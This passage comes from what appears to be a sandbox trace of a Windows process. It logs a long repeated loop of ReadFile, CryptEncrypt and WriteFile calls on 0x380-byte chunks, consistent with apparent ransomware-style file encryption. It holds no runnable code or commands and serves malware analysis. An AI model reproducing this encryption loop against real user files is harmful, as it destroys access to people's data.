lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.931] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.931] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.931] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.931] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.931] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.931] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.931] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.931] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.932] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.932] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.932] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.932] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.932] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.932] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.932] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.932] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.932] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.932] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.932] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.932] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.932] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.932] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.932] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.933] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.933] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.933] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.933] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.933] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.933] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.933] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.933] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.933] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.933] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.933] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.933] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.933] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.933] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.933] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.934] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.934] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.934] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.934] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.934] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.934] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.934] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.934] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.934] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.934] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.934] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.934] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.934] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.934] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.935] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.935] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.935] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.935] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.935] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.935] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.935] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.935] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.935] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.935] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.935] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.935] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.935] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.935] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.935] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.936] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.936] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.936] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.936] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.936] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.936] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.936] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.936] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.936] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.936] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.936] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.936] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.936] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.936] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.936] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.936] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.937] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.937] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.937] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.937] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.937] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.937] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.937] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.937] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.937] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.937] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.937] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.937] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.937] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.937] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) 